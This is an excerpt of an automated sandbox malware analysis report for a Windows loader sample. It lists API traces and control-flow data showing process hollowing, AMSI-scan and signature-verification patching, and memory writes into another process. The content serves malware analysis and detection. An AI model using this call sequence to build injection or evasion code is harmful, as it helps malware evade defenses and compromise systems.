                                                                              • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtOpenProcess,UacScan,029D7358,0299C46C,ScanString,029D7358,0299C46C,ScanBuffer,029D7358,0299C46C,Initialize,029D7358,0299C46C,UacScan,029D7358), ref: 0299A7F6
                                                                              • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0299A7FC
                                                                              • NtOpenProcess.NTDLL(029D7560,001F0FFF,029D7324,029D733C), ref: 0299A8F4
                                                                                • Part of subcall function 02982EE0: QueryPerformanceCounter.KERNEL32 ref: 02982EE4
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,?,0000007C,00000000,00000000), ref: 0299AC47
                                                                                • Part of subcall function 02997944: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02997951
                                                                                • Part of subcall function 02997944: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02997957
                                                                                • Part of subcall function 02997944: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02997977
                                                                              • IsBadReadPtr.KERNEL32(27860000,00000040,?,?,0000007C,00000000,00000000), ref: 0299ADE0
                                                                              • IsBadReadPtr.KERNEL32(?,000000F8,27860000,00000040,?,?,0000007C,00000000,00000000), ref: 0299AE0D
                                                                              • GetCurrentProcess.KERNEL32(00000000,17CF3400,00003000,00000040,?,000000F8,27860000,00000040,?,?,0000007C,00000000,00000000), ref: 0299AE64
                                                                              • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,ScanString,029D7358,0299C46C,ScanBuffer,029D7358,0299C46C,UacScan,029D7358,0299C46C,ScanBuffer,029D7358,0299C46C,OpenSession,029D7358), ref: 0299BAA6
                                                                              • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0299BAAC
                                                                              • NtWriteVirtualMemory.NTDLL(06420000,06420000,27A80000,17CF3400,00000000,OpenSession,029D7358,0299C46C,UacInitialize,029D7358,0299C46C,00000000,C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,ScanString,029D7358), ref: 0299BBBD
                                                                              • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtCreateThreadEx,UacScan,029D7358,0299C46C,ScanString,029D7358,0299C46C,?,?,0000007C,00000000,00000000), ref: 0299BCAB
                                                                              • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0299BCB1
                                                                              • NtCreateThreadEx.NTDLL(029D753C,02000000,029D7324,06421617,06421617,00000000,00000000,00000000,00000000,00000000,00000000,ScanBuffer,029D7358,0299C46C,UacInitialize,029D7358), ref: 0299BF2D
                                                                              • CloseHandle.KERNEL32(00000888,ScanString,029D7358,0299C46C,OpenSession,029D7358,0299C46C,?,?,0000007C,00000000,00000000), ref: 0299C028
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Handle$AddressModuleProc$Process$CurrentLibraryMemoryReadVirtual$AllocateCacheCloseCounterCreateFlushFreeInstructionLoadOpenPerformanceQueryThreadWrite
                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Windows\System32\ntdll.dll$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtCreateThreadEx$NtOpenObjectAuditAlarm$NtOpenProcess$NtSetSecurityObject$NtWriteVirtualMemory$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll
                                                                              • API String ID: 415501128-716930375
                                                                              • Opcode ID: b06d056a39288737e31e6e9085492bd0a6c8caec3e117599db8e9b3f58806a9b
                                                                              • Instruction ID: 4df1ee2e91ce6d0aff2b1e19431f6679bc328bf07e5d3213fee2b3afdcf0b54b
                                                                              • Opcode Fuzzy Hash: b06d056a39288737e31e6e9085492bd0a6c8caec3e117599db8e9b3f58806a9b
                                                                              • Instruction Fuzzy Hash: 00F2DE70B501599BDF11FBA8CD80EDEB3FAAFC9710F1450E6A009EB254DA31AE858F51

                                                                              Control-flow Graph

                                                                              control_flow_graph 6806 29981b8-29981bb 6807 29981c0-29981c5 6806->6807 6807->6807 6808 29981c7-29982ae call 298493c call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 6807->6808 6839 2999c93-2999cfd call 29844d0 * 2 call 2984c0c call 29844d0 call 29844ac call 29844d0 * 2 6808->6839 6840 29982b4-299838f call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 6808->6840 6840->6839 6884 2998395-29986bd call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29830d4 * 2 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2984d8c call 2984d9c CreateProcessAsUserW 6840->6884 6991 29986bf-299872b call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 6884->6991 6992 2998730-2998a56 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29846a4 * 2 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2982ee0 call 2982f08 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 
29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 GetThreadContext 6884->6992 6991->6992 6992->6839 7100 2998a5c-2998cbf call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 NtReadVirtualMemory 6992->7100 7171 2998fcc-2999038 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 7100->7171 7172 2998cc5-2998e2e call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 NtUnmapViewOfSection 7100->7172 7199 299903d-29991bd call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2997944 7171->7199 7258 2998e58-2998ec4 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 7172->7258 7259 2998e30-2998e4c call 2997944 7172->7259 7199->6839 7303 29991c3-29992bc call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29980c8 7199->7303 7268 2998ec9-2998fc0 call 298480c call 298494c call 29846a4 call 
2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2997944 7258->7268 7265 2998e51-2998e56 7259->7265 7265->7268 7338 2998fc5-2998fca 7268->7338 7352 29992be-299930b call 2997fc0 call 2997fb4 7303->7352 7353 2999310-2999c8e call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 NtWriteVirtualMemory call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 NtWriteVirtualMemory call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 SetThreadContext NtResumeThread call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2982c2c call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2997cc8 * 3 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2997cc8 * 2 call 298480c call 298494c call 2984798 call 298494c call 2997cc8 call 298480c call 298494c call 2984798 call 298494c call 2997cc8 * 7 call 298480c call 298494c call 29846a4 call 2984798 call 
298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 7303->7353 7338->7199 7352->7353 7353->6839
                                                                              APIs
                                                                                • Part of subcall function 02997E14: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02997F0D), ref: 02997E4C
                                                                                • Part of subcall function 02997E14: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02997F0D), ref: 02997E5A
                                                                                • Part of subcall function 02997E14: GetProcAddress.KERNEL32(75370000,00000000), ref: 02997E73
                                                                                • Part of subcall function 02997E14: NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000,00000000), ref: 02997EE2
                                                                                • Part of subcall function 02997E14: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000), ref: 02997EED
                                                                              • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029D73BC,029D73AC,OpenSession,029D7384,02999D18,ScanString,029D7384), ref: 029986B6
                                                                              • GetThreadContext.KERNEL32(00000894,029D7400,ScanString,029D7384,02999D18,UacInitialize,029D7384,02999D18,ScanBuffer,029D7384,02999D18,ScanBuffer,029D7384,02999D18,UacInitialize,029D7384), ref: 02998A4F
                                                                              • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000898,003F7FF8,029D74D4,00000004,029D74DC,ScanBuffer,029D7384,02999D18,ScanString,029D7384,02999D18,Initialize,029D7384,02999D18,UacScan,029D7384), ref: 02998CAC
                                                                              • NtUnmapViewOfSection.N(00000898,00400000,ScanBuffer,029D7384,02999D18,ScanString,029D7384,02999D18,Initialize,029D7384,02999D18,00000898,003F7FF8,029D74D4,00000004,029D74DC), ref: 02998E27
                                                                                • Part of subcall function 02997944: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02997951
                                                                                • Part of subcall function 02997944: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02997957
                                                                                • Part of subcall function 02997944: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02997977
                                                                              • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000898,00400000,00000000,17D5E400,029D74DC,ScanBuffer,029D7384,02999D18,ScanString,029D7384,02999D18,Initialize,029D7384,02999D18,ScanBuffer,029D7384), ref: 0299947B
                                                                              • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000898,003F7FF8,029D74D8,00000004,029D74DC,ScanBuffer,029D7384,02999D18,ScanString,029D7384,02999D18,Initialize,029D7384,02999D18,00000898,00400000), ref: 029995EE
                                                                              • SetThreadContext.KERNEL32(00000894,029D7400,ScanBuffer,029D7384,02999D18,ScanString,029D7384,02999D18,Initialize,029D7384,02999D18,00000898,003F7FF8,029D74D8,00000004,029D74DC), ref: 02999764
                                                                              • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000894,00000000,00000894,029D7400,ScanBuffer,029D7384,02999D18,ScanString,029D7384,02999D18,Initialize,029D7384,02999D18,00000898,003F7FF8,029D74D8), ref: 02999771
                                                                                • Part of subcall function 02997CC8: LoadLibraryW.KERNEL32(bcrypt,?,00000894,00000000,029D7384,029999D4,ScanString,029D7384,02999D18,ScanBuffer,029D7384,02999D18,Initialize,029D7384,02999D18,UacScan), ref: 02997CDC
                                                                                • Part of subcall function 02997CC8: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02997CF6
                                                                                • Part of subcall function 02997CC8: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000898,00000000,029D7368,00000001,029D7374,00000000,BCryptVerifySignature,bcrypt,?,00000894,00000000,029D7384,029999D4,ScanString,029D7384,02999D18), ref: 02997D1C
                                                                                • Part of subcall function 02997CC8: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000894,00000000,029D7384,029999D4,ScanString,029D7384,02999D18,ScanBuffer,029D7384,02999D18,Initialize), ref: 02997D32
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MemoryVirtual$Library$AddressProcThreadWrite$ContextFreeHandleLoadModule$AllocateCacheCreateFlushInstructionProcessReadResumeSectionUnmapUserView
                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                              • API String ID: 3118559676-51457883
                                                                              • Opcode ID: 2d7264444570c5e3af3e248cb62a6be16325ccdc324eff6384d5d53cdaf12a07
                                                                              • Instruction ID: a6dfb7b387dfde8f48966b517cbe65386130723de8bbcf1d46f689bb5078ac4d
                                                                              • Opcode Fuzzy Hash: 2d7264444570c5e3af3e248cb62a6be16325ccdc324eff6384d5d53cdaf12a07
                                                                              • Instruction Fuzzy Hash: F3E20C75A501199FEF21FBA8CD81EDEB3BAAFC5310F1454E5A009AB254DE30AE85CF50

                                                                              Control-flow Graph
                                                                              • Graph rendering not reproduced. Function at 29981b6; Win32/native calls along the graph, in order: CreateProcessAsUserW, GetThreadContext, NtReadVirtualMemory, NtUnmapViewOfSection, NtAllocateVirtualMemory (via subcall 2997944), NtWriteVirtualMemory (twice), SetThreadContext, NtResumeThread.
                                                                              APIs
                                                                                • Part of subcall function 02997E14: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02997F0D), ref: 02997E4C
                                                                                • Part of subcall function 02997E14: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02997F0D), ref: 02997E5A
                                                                                • Part of subcall function 02997E14: GetProcAddress.KERNEL32(75370000,00000000), ref: 02997E73
                                                                                • Part of subcall function 02997E14: NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000,00000000), ref: 02997EE2
                                                                                • Part of subcall function 02997E14: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000), ref: 02997EED
                                                                              • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029D73BC,029D73AC,OpenSession,029D7384,02999D18,ScanString,029D7384), ref: 029986B6
                                                                              • GetThreadContext.KERNEL32(00000894,029D7400,ScanString,029D7384,02999D18,UacInitialize,029D7384,02999D18,ScanBuffer,029D7384,02999D18,ScanBuffer,029D7384,02999D18,UacInitialize,029D7384), ref: 02998A4F
                                                                              • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000898,003F7FF8,029D74D4,00000004,029D74DC,ScanBuffer,029D7384,02999D18,ScanString,029D7384,02999D18,Initialize,029D7384,02999D18,UacScan,029D7384), ref: 02998CAC
                                                                              • NtUnmapViewOfSection.N(00000898,00400000,ScanBuffer,029D7384,02999D18,ScanString,029D7384,02999D18,Initialize,029D7384,02999D18,00000898,003F7FF8,029D74D4,00000004,029D74DC), ref: 02998E27
                                                                                • Part of subcall function 02997944: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02997951
                                                                                • Part of subcall function 02997944: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02997957
                                                                                • Part of subcall function 02997944: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02997977
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleLibraryMemoryModuleProcVirtual$AllocateCacheContextCreateFlushFreeInstructionLoadProcessReadSectionThreadUnmapUserView
                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                              • API String ID: 1803274339-51457883
                                                                              • Opcode ID: a601048772cfb2d7616f5cf851a574f41bf0285b344385b17a282aaa84a7c0dc
                                                                              • Instruction ID: 94f548662f857131f022fa3e7de1cf85fb045195f92758bd9258e7bf46314ad1
                                                                              • Opcode Fuzzy Hash: a601048772cfb2d7616f5cf851a574f41bf0285b344385b17a282aaa84a7c0dc
                                                                              • Instruction Fuzzy Hash: FFE20C75A501199FEF21FBA8CD81EDEB3BAAFC5310F1454A5A009AB254DE30AE85CF50

                                                                              Control-flow Graph
                                                                              • Graph rendering not reproduced. Function at 2985a78; calls along the graph: GetModuleFileNameA, RegOpenKeyExA (Software\Borland\Locales and Software\Borland\Delphi\Locales), RegQueryValueExA, RegCloseKey, lstrcpynA, GetThreadLocale, GetLocaleInfoA, lstrlenA, LoadLibraryExA. This is the standard Delphi RTL lookup of a locale-specific resource module, not sample-specific behaviour.
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02980000,029AB790), ref: 02985A94
                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02980000,029AB790), ref: 02985AB2
                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02980000,029AB790), ref: 02985AD0
                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02985AEE
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02985B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02985B37
                                                                              • RegQueryValueExA.ADVAPI32(?,02985CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02985B7D,?,80000001), ref: 02985B55
                                                                              • RegCloseKey.ADVAPI32(?,02985B84,00000000,?,?,00000000,02985B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02985B77
                                                                              • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02985B94
                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02985BA1
                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02985BA7
                                                                              • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02985BD2
                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02985C19
                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02985C29
                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02985C51
                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02985C61
                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02985C87
                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02985C97
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                              • API String ID: 1759228003-2375825460
                                                                              • Opcode ID: a89973d87c030b4cf17730beb74d89c4a4c633d7efdd3ed6801e04b15f75d544
                                                                              • Instruction ID: 23def2c09a425f169f54f8c6aba11bb05b480a96eb552cbe9b068780dc78d36e
                                                                              • Opcode Fuzzy Hash: a89973d87c030b4cf17730beb74d89c4a4c633d7efdd3ed6801e04b15f75d544
                                                                              • Instruction Fuzzy Hash: 4D51B571A4020C7EFB25EAE4CC46FEF77AD9B44754F8A01A5A704E61C0DB749A488F61

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(ntdll,00000000,00000000,02997B18,?,?,00000000), ref: 02997AD8
                                                                              • GetProcAddress.KERNEL32(00000000,ntdll), ref: 02997ADE
                                                                              • NtWriteVirtualMemory.NTDLL(?,?,?,?,?,00000000,ntdll,00000000,00000000,02997B18,?,?,00000000), ref: 02997AFC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleMemoryModuleProcVirtualWrite
                                                                              • String ID: NtWriteV$irtualMemory$ntdll
                                                                              • API String ID: 4260932595-852282483
                                                                              • Opcode ID: c207579aefcfa06b31b5dde2012ec39a14c75e6d7984d0ed3bf3ae69c383cb48
                                                                              • Instruction ID: e2bb293f6bf61f99d05aeac348d59b27039474bac2664c4698ef71f1bb074f9c
                                                                              • Opcode Fuzzy Hash: c207579aefcfa06b31b5dde2012ec39a14c75e6d7984d0ed3bf3ae69c383cb48
                                                                              • Instruction Fuzzy Hash: F6014FB5654208AFEB00EFE8D841DEFF7EDEB88720B554868B904D7600DA30ED109B60

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(ntdll,00000000,00000000,02997B18,?,?,00000000), ref: 02997AD8
                                                                              • GetProcAddress.KERNEL32(00000000,ntdll), ref: 02997ADE
                                                                              • NtWriteVirtualMemory.NTDLL(?,?,?,?,?,00000000,ntdll,00000000,00000000,02997B18,?,?,00000000), ref: 02997AFC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleMemoryModuleProcVirtualWrite
                                                                              • String ID: NtWriteV$irtualMemory$ntdll
                                                                              • API String ID: 4260932595-852282483
                                                                              • Opcode ID: 27a9e208ba267549223fcf2d499669c4c77c0c5a00f0ac53e71eeb96387d6cbe
                                                                              • Instruction ID: 0c0e47be9cf5064da766e6527c5321fc2e6e7e521cc967ff7f20afe75fd05143
                                                                              • Opcode Fuzzy Hash: 27a9e208ba267549223fcf2d499669c4c77c0c5a00f0ac53e71eeb96387d6cbe
                                                                              • Instruction Fuzzy Hash: D1014FB5654208AFDB00EFE8D841DEFF7EDEB88720B554868B904D7600DA30ED109B60

                                                                              Control-flow Graph
                                                                              • Graph rendering not reproduced. Function at 2997cc8; calls along the graph: LoadLibraryW (bcrypt), GetProcAddress (BCryptVerifySignature), NtWriteVirtualMemory, FreeLibrary.
                                                                              APIs
                                                                              • LoadLibraryW.KERNEL32(bcrypt,?,00000894,00000000,029D7384,029999D4,ScanString,029D7384,02999D18,ScanBuffer,029D7384,02999D18,Initialize,029D7384,02999D18,UacScan), ref: 02997CDC
                                                                              • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02997CF6
                                                                              • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000898,00000000,029D7368,00000001,029D7374,00000000,BCryptVerifySignature,bcrypt,?,00000894,00000000,029D7384,029999D4,ScanString,029D7384,02999D18), ref: 02997D1C
                                                                              • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000894,00000000,029D7384,029999D4,ScanString,029D7384,02999D18,ScanBuffer,029D7384,02999D18,Initialize), ref: 02997D32
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                              • String ID: BCryptVerifySignature$bcrypt
                                                                              • API String ID: 1002360270-4067648912
                                                                              • Opcode ID: b32b56df2515201832b73919104611cfdf476aef0a99e24f05488edfa362c564
                                                                              • Instruction ID: 7c147904da84b423ba6848271d6ff19755299b2b592c78e058aa73b477b14a20
                                                                              • Opcode Fuzzy Hash: b32b56df2515201832b73919104611cfdf476aef0a99e24f05488edfa362c564
                                                                              • Instruction Fuzzy Hash: 76F08171AC62146FD714AAFCBC44BFAF39CA785664F040926B914C6280DB706891DB60

                                                                              Control-flow Graph
